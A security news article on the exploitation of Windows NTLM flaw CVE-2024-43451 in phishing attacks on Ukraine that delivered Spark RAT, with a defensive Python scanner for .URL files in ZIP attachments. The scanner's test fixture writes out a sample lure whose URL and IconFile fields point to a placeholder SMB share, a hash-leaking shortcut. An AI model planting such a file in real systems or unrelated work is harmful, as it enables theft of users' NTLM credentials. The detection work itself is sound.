Russian Cybercriminals Exploit NTLM Flaw to Launch RAT Malware via Phishing Attacks

November 14, 2024

A newly discovered security vulnerability in Windows NT LAN Manager (NTLM) has been exploited by suspected Russian cybercriminals in a series of cyberattacks on Ukraine. The flaw, known as CVE-2024-43451, allows for NTLM hash disclosure spoofing, which can be used to illicitly acquire a user's NTLMv2 hash. Microsoft has recently issued a patch for this vulnerability.

The exploitation of this flaw was first identified by Israeli cybersecurity company ClearSky in June 2024. The company found that it was being used in an attack chain to deliver the open-source Spark RAT malware. According to Microsoft's advisory, minimal interaction with a malicious file, such as selecting, inspecting, or performing an action other than opening or executing, could trigger this vulnerability.

The cybercriminals initiated the attack by sending phishing emails from a compromised Ukrainian government server. The email recipients were prompted to renew their academic certificates by clicking on a URL embedded in the message, which led to the download of a ZIP archive containing a malicious internet shortcut (.URL) file. The vulnerability was triggered when the victim interacted with the URL file.

This URL file was designed to establish connections with a remote server to download additional payloads, including Spark RAT. ClearSky further noted, 'In addition, a sandbox execution raised an alert about an attempt to pass the NTLM (NT LAN Manager) Hash through the SMB (Server Message Block) protocol. After receiving the NTLM Hash, an attacker can carry out a Pass-the-Hash attack to identify as the user associated with the captured hash without needing the corresponding password.'
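The chain above turns on a .URL file whose target points at a remote host, so that merely listing or inspecting the file makes Windows authenticate to that host over SMB. As an added defender's example (not code from ClearSky, CERT-UA or the article), the following Python scans a ZIP attachment for .URL entries whose URL, IconFile or WorkingDirectory field names a UNC path or file:// target; the field names are assumed from the standard .URL format, and the sample archive and the 203.0.113.10 address are constructed placeholders, not indicators from the campaign.

```python
import io
import re
import zipfile
from configparser import ConfigParser, Error as ConfigError

# .URL files are INI text; these fields name a target the shell may resolve when the
# file is merely listed or inspected. Assumption: standard field names; the article
# does not say which field the lure used.
REMOTE_FIELDS = ("URL", "IconFile", "WorkingDirectory")
# UNC paths (\\host\share) and file:// URLs make Windows authenticate to a remote
# SMB/WebDAV host, which is how an NTLMv2 hash leaves the machine.
REMOTE_TARGET = re.compile(r"^(?:\\\\|file:)", re.IGNORECASE)

def scan_url_text(name, text):
    """Return (file name, field, target) for each remote target in one .URL file."""
    cp = ConfigParser(interpolation=None, strict=False)  # option names are case-folded
    try:
        cp.read_string(text)
    except ConfigError:
        return [(name, "<unparseable>", "")]  # a malformed .URL file is worth a look too
    hits = []
    for section in cp.sections():
        if section.lower() != "internetshortcut":
            continue
        for field in REMOTE_FIELDS:
            value = cp.get(section, field, fallback="").strip()
            if REMOTE_TARGET.match(value):
                hits.append((name, field, value))
    return hits

def scan_zip_bytes(data):
    """Scan a ZIP attachment (as bytes) for .URL entries with remote targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".url"):
                text = zf.read(info).decode("utf-8-sig", errors="replace")
                findings.extend(scan_url_text(info.filename, text))
    return findings

def build_sample_zip():
    """Constructed sample archive, not the real lure; 203.0.113.10 is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("certificate_renewal.url",
                    "[InternetShortcut]\r\nURL=\\\\203.0.113.10\\share\\renew\r\n"
                    "IconFile=\\\\203.0.113.10\\share\\icon.ico\r\n")
        zf.writestr("benign.url", "[InternetShortcut]\r\nURL=https://example.org/\r\n")
    return buf.getvalue()
```

Running `scan_zip_bytes(build_sample_zip())` flags both remote fields of the lure entry and nothing for the HTTPS shortcut; the same check can be applied at a mail gateway before the archive ever reaches a user's shell, alongside blocking outbound SMB at the perimeter.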

The Computer Emergency Response Team of Ukraine (CERT-UA) has attributed this activity to a probable Russian threat actor it tracks as UAC-0194. In recent weeks, CERT-UA has also warned that tax-related phishing emails are being used to distribute LiteManager, a legitimate remote desktop tool. CERT-UA describes this campaign as financially motivated and carried out by a threat actor it tracks as UAC-0050. CERT-UA cautioned that 'Accountants of enterprises whose computers work with remote banking systems are in a special risk zone. In some cases, as evidenced by the results of computer forensic investigations, it may take no more than an hour from the moment of the initial attack to the moment of theft of funds.'
